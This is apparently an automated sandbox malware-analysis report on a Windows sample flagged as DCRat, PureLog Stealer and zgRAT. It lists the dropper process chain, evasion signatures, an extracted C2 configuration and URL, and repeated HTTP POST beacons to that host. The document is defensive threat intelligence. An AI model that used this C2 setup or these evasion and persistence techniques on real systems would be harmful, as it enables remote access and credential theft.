Edit tour

Windows Analysis Report
0V2JsCrGUB.exe

Overview

General Information

Sample name:	0V2JsCrGUB.exe renamed because original name is a hash value
Original sample name:	4E9DDBFBEB41BD97825E0F79426307CB.exe
Analysis ID:	1586884
MD5:	4e9ddbfbeb41bd97825e0f79426307cb
SHA1:	f7c1150945e4d9ac8f86b0e0c5ee5f2441e1983b
SHA256:	f0a78b4d2a7cc344b747116e39e0d59231d05f9b6456392977de364414c9c987
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

0V2JsCrGUB.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\0V2JsCrGUB.exe" MD5: 4E9DDBFBEB41BD97825E0F79426307CB)

wscript.exe (PID: 7476 cmdline: "C:\Windows\System32\WScript.exe" "C:\winRefruntime\0jfMNzpItgnyb3dolhtjTtJBeKE8V11tqFqpGcy14sQRgDlNdePdmeq.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /c ""C:\winRefruntime\T8Mz9n0cgvFWE.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MsAgentDriverruntime.exe (PID: 7644 cmdline: "C:\winRefruntime/MsAgentDriverruntime.exe" MD5: C3A0C717ED8A025658E5A4C0F53281D9)

cmd.exe (PID: 7732 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ani1HH9Yqa.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7820 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7840 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WBnjVTGHzbhirvM.exe (PID: 7948 cmdline: "C:\Recovery\WBnjVTGHzbhirvM.exe" MD5: C3A0C717ED8A025658E5A4C0F53281D9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://517300cm.renyash.ru/pipeJavascriptDefaulttrafficWp", "MUTEX": "DCR_MUTEX-yT0wzpcF5lXdbguiJ4ea"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
0V2JsCrGUB.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0V2JsCrGUB.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\winRefruntime\MsAgentDriverruntime.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\winRefruntime\MsAgentDriverruntime.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\WmiPrvSE.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\WBnjVTGHzbhirvM.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\WBnjVTGHzbhirvM.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\WBnjVTGHzbhirvM.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\WBnjVTGHzbhirvM.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\WBnjVTGHzbhirvM.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\WBnjVTGHzbhirvM.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\WBnjVTGHzbhirvM.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\WBnjVTGHzbhirvM.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000004.00000000.1739595481.0000000000812000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.2913344594.0000000002C30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000B.00000002.2913344594.00000000028A7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000003.1648958225.00000000065F4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1649569498.0000000004F31000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.2913344594.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000004.00000002.1776692230.0000000012F8C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: MsAgentDriverruntime.exe PID: 7644	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WBnjVTGHzbhirvM.exe PID: 7948	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.0V2JsCrGUB.exe.6642709.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.0V2JsCrGUB.exe.6642709.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.0V2JsCrGUB.exe.4f7f709.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.0V2JsCrGUB.exe.4f7f709.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.0.MsAgentDriverruntime.exe.810000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.0.MsAgentDriverruntime.exe.810000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.0V2JsCrGUB.exe.6642709.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.0V2JsCrGUB.exe.6642709.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.0V2JsCrGUB.exe.4f7f709.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.0V2JsCrGUB.exe.4f7f709.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\winRefruntime\MsAgentDriverruntime.exe, ProcessId: 7644, TargetFilename: C:\Recovery\WmiPrvSE.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\winRefruntime\0jfMNzpItgnyb3dolhtjTtJBeKE8V11tqFqpGcy14sQRgDlNdePdmeq.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\winRefruntime\0jfMNzpItgnyb3dolhtjTtJBeKE8V11tqFqpGcy14sQRgDlNdePdmeq.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\0V2JsCrGUB.exe", ParentImage: C:\Users\user\Desktop\0V2JsCrGUB.exe, ParentProcessId: 7432, ParentProcessName: 0V2JsCrGUB.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\winRefruntime\0jfMNzpItgnyb3dolhtjTtJBeKE8V11tqFqpGcy14sQRgDlNdePdmeq.vbe" , ProcessId: 7476, ProcessName: wscript.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T18:12:14.768552+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49732	104.21.38.84	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 0V2JsCrGUB.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://517300cm.renyash.ru/	Avira URL Cloud: Label: malware
Source: http://517300cm.renyash.ru	Avira URL Cloud: Label: malware
Source: http://517300cm.renyash.ru/pipeJavascriptDefaulttrafficWp.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\ani1HH9Yqa.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\sbJHDJmG.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\viSXCyGd.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Recovery\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\winRefruntime\0jfMNzpItgnyb3dolhtjTtJBeKE8V11tqFqpGcy14sQRgDlNdePdmeq.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\hnfQTxsY.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\GWwNmKBL.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 00000004.00000002.1776692230.0000000012F8C000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://517300cm.renyash.ru/pipeJavascriptDefaulttrafficWp", "MUTEX": "DCR_MUTEX-yT0wzpcF5lXdbguiJ4ea"}

Multi AV Scanner detection for dropped file

Source: C:\Recovery\WBnjVTGHzbhirvM.exe	ReversingLabs: Detection: 65%
Source: C:\Recovery\WmiPrvSE.exe	ReversingLabs: Detection: 65%
Source: C:\Users\Default\Favorites\WBnjVTGHzbhirvM.exe	ReversingLabs: Detection: 65%
Source: C:\Users\Public\Desktop\WBnjVTGHzbhirvM.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\GWwNmKBL.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\PinddLxP.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\cZPJNcWU.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\hnfQTxsY.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\sbJHDJmG.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\viSXCyGd.log	ReversingLabs: Detection: 50%
Source: C:\Windows\PLA\Templates\WBnjVTGHzbhirvM.exe	ReversingLabs: Detection: 65%
Source: C:\winRefruntime\MsAgentDriverruntime.exe	ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: 0V2JsCrGUB.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 92.4% probability

Machine Learning detection for dropped file

Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\sbJHDJmG.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\wJQffXMu.log	Joe Sandbox ML: detected
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Joe Sandbox ML: detected
Source: C:\Recovery\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\nFKhSFqw.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GWwNmKBL.log	Joe Sandbox ML: detected
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Joe Sandbox ML: detected
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 0V2JsCrGUB.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000004.00000002.1776692230.0000000012F8C000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-yT0wzpcF5lXdbguiJ4ea","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
Source: 00000004.00000002.1776692230.0000000012F8C000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://517300cm.renyash.ru/","pipeJavascriptDefaulttrafficWp"]]

Source: 0V2JsCrGUB.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0V2JsCrGUB.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 0V2JsCrGUB.exe

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0034A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_0034A69B
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0035C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_0035C220

Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49732 -> 104.21.38.84:80

Source: Joe Sandbox View

IP Address: 104.21.38.84 104.21.38.84

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1292Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1292Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1292Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1292Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
